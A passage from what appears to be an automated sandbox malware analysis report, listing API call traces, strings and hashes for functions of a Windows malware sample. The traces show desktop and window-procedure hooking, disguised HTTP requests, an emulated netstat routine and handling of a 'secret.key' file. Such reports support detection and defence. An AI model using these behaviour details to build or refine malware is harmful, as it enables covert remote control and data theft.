                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              • API String ID: 350293641-582869414
                                                                                                                                                                                                              • Opcode ID: a57002d53771a33bd9e1c7fa014d7245fa63e40c3c75556856ca8d29890e41af
                                                                                                                                                                                                              • Instruction ID: 1ab6e015330067746f7c5506f9f7ef3acf678cf49243d5a0bb20c3aa435243a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a57002d53771a33bd9e1c7fa014d7245fa63e40c3c75556856ca8d29890e41af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0A7B16442286BDB74EA78DC4ABE573AC9714705F4002D9FB4DD61C0E7F016C48B91
                                                                                                                                                                                                              Function 012EBC50 Relevance: 179.0, APIs: 63, Strings: 39, Instructions: 494libraryloaderfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EBC67
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012EBC72
                                                                                                                                                                                                                • Part of subcall function 012ED970: GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                                • Part of subcall function 012ED970: lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              • RegisterWindowMessageA.USER32(9e2b3b2da), ref: 012EBC87
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F5A0), ref: 012EBCB0
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,0132F670), ref: 012EBCC3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,0132F630), ref: 012EBCDA
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 012EBCF6
                                                                                                                                                                                                              • Sleep.KERNEL32(000000C8), ref: 012EBD06
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EBD0E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012EBD27
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012EBD2E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012EBD44
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBD70
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F54C), ref: 012EBD7E
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EBD91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012EBDC8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012EBDDC
                                                                                                                                                                                                              • Sleep.KERNEL32(000000C8), ref: 012EBDE7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EBDF4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBDFF
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F54C), ref: 012EBE0D
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EBE20
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EBE35
                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,0132F5DC), ref: 012EBE43
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012EBE4E
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012EBE62
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefWindowProcW), ref: 012EBE9C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefWindowProcA,00000000,Function_0000AE10,0132EBAC), ref: 012EBEBC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefDlgProcW,00000000,Function_0000AE90,0132EBA4), ref: 012EBEDC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefDlgProcA,00000000,Function_0000AF10,0132EB40), ref: 012EBEFC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefFrameProcW,00000000,Function_0000AFA0,0132EB48), ref: 012EBF1C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefFrameProcA,00000000,Function_0000B020,0132EBA8), ref: 012EBF3C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefMDIChildProcW,00000000,Function_0000B0A0,0132EB80), ref: 012EBF5C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefMDIChildProcA,00000000,Function_0000B120,0132EB94), ref: 012EBF7C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CallWindowProcW,00000000,Function_0000B1A0,0132EB68), ref: 012EBF9C
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                                • Part of subcall function 012FA540: memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CallWindowProcA,00000000,Function_0000B220,0132EB9C), ref: 012EBFBC
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA67A
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA686
                                                                                                                                                                                                                • Part of subcall function 012FA540: GetCurrentProcess.KERNEL32(00000000,00000000,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA697
                                                                                                                                                                                                                • Part of subcall function 012FA540: FlushInstructionCache.KERNEL32(00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA69E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassW,00000000,Function_0000B2A0,0132EB2C), ref: 012EBFDC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassA,00000000,Function_0000B360,0132EB54), ref: 012EBFFC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassExA,00000000,Function_0000B3F0,0132EB8C), ref: 012EC01C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassExW,00000000,Function_0000B4E0,0132EB30), ref: 012EC03C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PeekMessageW,00000000,Function_0000B480,0132EB84), ref: 012EC05C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PeekMessageA,00000000,Function_0000B9C0,0132EBA0), ref: 012EC07C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenInputDesktop,00000000,Function_0000BA30,0132EB50), ref: 012EC09C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenDesktopA,00000000,Function_0000B540,0132EB28), ref: 012EC0BC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenDesktopW,00000000,Function_0000B570,0132EB88), ref: 012EC0DC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SwitchDesktop,00000000,Function_0000B5D0,0132EB98), ref: 012EC0FC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBeep,00000000,Function_0000B630,0132EB58), ref: 012EC11C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlashWindowEx,00000000,Function_0000B6F0,0132EB3C), ref: 012EC13C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCursorPos,00000000,Function_0000B710,0132EB44), ref: 012EC15C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCursorPos,00000000,Function_0000B760,0132EB90), ref: 012EC17C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessagePos,00000000,Function_0000B7A0,0132EB60), ref: 012EC19C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCapture,00000000,012EB7F0,0132EB5C), ref: 012EC1BC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseCapture,00000000,Function_0000B820,0132EB6C), ref: 012EC1DC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCapture,00000000,012EB920,0132EB70), ref: 012EC1FC
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Winmm.dll,00000000,00000000,00000000,012EBAA0,0132EB4C), ref: 012EC223
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PlaySoundW), ref: 012EC235
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PlaySoundA,00000000,Function_0000B670,0132EB34), ref: 012EC255
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,sndPlaySoundW,00000000,Function_0000B650,0132EB7C), ref: 012EC275
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,sndPlaySoundA,00000000,Function_0000B6B0,0132EB38), ref: 012EC295
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Kernel32.dll,00000000,00000000,00000000,Function_0000B690,0132EB64), ref: 012EC2B4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Beep), ref: 012EC2C0
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Gdi32.dll,00000000,00000000,00000000,Function_0000B6D0,0132EB78), ref: 012EC2DF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDIBitsToDevice), ref: 012EC2EB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$FileOpen$Virtualwsprintf$LibraryLoadMutexProtect$CurrentMappingObjectView$HandleInformationProcessReleaseSingleSleepThreadWait$AllocCacheCloseComputerCountCreateDesktopEventFlushHeapInstructionMessageNameRegisterTickUserWindowlstrcmpilstrlenmemcpy
                                                                                                                                                                                                              • String ID: 9e2b3b2da$Beep$CallWindowProcA$CallWindowProcW$DefDlgProcA$DefDlgProcW$DefFrameProcA$DefFrameProcW$DefMDIChildProcA$DefMDIChildProcW$DefWindowProcA$DefWindowProcW$FlashWindowEx$Gdi32.dll$GetCapture$GetCursorPos$GetMessagePos$Kernel32.dll$MessageBeep$OpenDesktopA$OpenDesktopW$OpenInputDesktop$PeekMessageA$PeekMessageW$PlaySoundA$PlaySoundW$RegisterClassA$RegisterClassExA$RegisterClassExW$RegisterClassW$ReleaseCapture$SetCapture$SetCursorPos$SetDIBitsToDevice$SwitchDesktop$Winmm.dll$sndPlaySoundA$sndPlaySoundW$user32.dll
                                                                                                                                                                                                              • API String ID: 1664322764-616144414
                                                                                                                                                                                                              • Opcode ID: 664107efd5d7eacb2ad0d302a0a6130576fafb1b1e9be530e2e552f4cb458b96
                                                                                                                                                                                                              • Instruction ID: 2863e7f00617986d45dbae459c03b36b89ba840fbc8011b1e1e729dafbff9652
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 664107efd5d7eacb2ad0d302a0a6130576fafb1b1e9be530e2e552f4cb458b96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46D15571FA032775EE207BB75D5FF663A9C5B10E58F50042DFB05F2285DAA9E1004A78
                                                                                                                                                                                                              Function 012F4AB0 Relevance: 98.4, APIs: 48, Strings: 8, Instructions: 421memorynetworkfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000,012E6E36,00000000), ref: 012F4AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,00000000,012E6E36,00000000), ref: 012F4B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F4B2E
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000017), ref: 012F4B3E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,012E6E36,00000004,00000000,012E6E36,00000000), ref: 012F4B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 012F4BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,012E6E36,00000050,00000000,00000000,00000003,00000000,00000001), ref: 012F4BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 012F4C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 012F4C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 012F4C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,Content-Type: multipart/form-data; boundary=---------------------------%s,01339C60), ref: 012F4C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 012F4C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 012F4CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 012F4CCD
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F4D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012F4D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,012E6E36,00000004,00000000), ref: 012F4D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 012F4D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 012F4D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010), ref: 012F4D83
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F4D86
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00001010), ref: 012F4D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 012F4DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F4DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004), ref: 012F4E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F4E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GET, xrefs: 012F4BF5
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 012F4C6B
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 012F4C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 012F4BBD
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 012F4C42
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 012F4D27
                                                                                                                                                                                                              • POST, xrefs: 012F4BFE, 012F4C17
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 012F4C58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$AllocHandleInfoOpenValidate$CloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1453177232-3558862663
                                                                                                                                                                                                              • Opcode ID: 9d17faf2cca54e8b16cb5ee4ea0a9684f0732f9b58b358f8fd1e7af9760f7563
                                                                                                                                                                                                              • Instruction ID: aa61e44dfaa2082a52b3000d86c439ad0540ff082fe83f078c10359a03ae88a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d17faf2cca54e8b16cb5ee4ea0a9684f0732f9b58b358f8fd1e7af9760f7563
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CD16271A10256ABEB30AF659C49FEF7B6CAF48714F10412DFB05E61C4DAB4D640CBA4
                                                                                                                                                                                                              Function 012E4180 Relevance: 98.3, APIs: 42, Strings: 14, Instructions: 300memoryfilenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,774D3490), ref: 012E419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E41A0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C10), ref: 012E41B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E4224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E4235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4242
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E4245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 012E425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E4260
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000BED), ref: 012E4270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E42AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E42AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 012E42DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E42DD
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-000000A9), ref: 012E42F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 012E4346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E434D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E4365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012E439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012E43B0
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,TCP%s:%d%s:%d%s,00000000), ref: 012E43C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E43DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E43DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E43EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E43ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E43F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E43FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E4409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(012E58F7,00000000,00000000,00000001), ref: 012E446E
                                                                                                                                                                                                              • LockFile.KERNEL32(012E58F7,00000000,00000000,00000001,00000000), ref: 012E447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(012E58F7,00000000,00000001,00000000,00000000), ref: 012E448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(012E58F7,012E58F7,00000000,00000001,00000000), ref: 012E449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E44AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E44AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E44BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E44BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              • API String ID: 2439004899-2402783461
                                                                                                                                                                                                              • Opcode ID: aded540899001f4814b5c69c7918cd439a2e658901053336824d2ff65c65854c
                                                                                                                                                                                                              • Instruction ID: 92203461de332930f8abc7bfa9fc045b72cc70fc2f9ec87cfcf4077822f9b034
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aded540899001f4814b5c69c7918cd439a2e658901053336824d2ff65c65854c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1A19471A00355ABEB30AFA59C4DFAF7FBCEB85711F548118F605E7284DA749604CBA0
                                                                                                                                                                                                              Function 01300810 Relevance: 94.9, APIs: 46, Strings: 8, Instructions: 383memorysleepstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 01300830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c11d), ref: 01300857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01300895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130089F
                                                                                                                                                                                                              • #680.SHELL32 ref: 013008A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013008B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013008C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013008FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0130090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c11d,?,?), ref: 01300945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0130097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300989
                                                                                                                                                                                                              • #680.SHELL32 ref: 01300991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013009A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013009A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013009D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01300A00
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208), ref: 01300A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 01300A65
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208,?,?,secret.key,00000002,?,?,?), ref: 01300AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 01300AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,0132A5BC,00000002,?,?,?), ref: 01300AE7
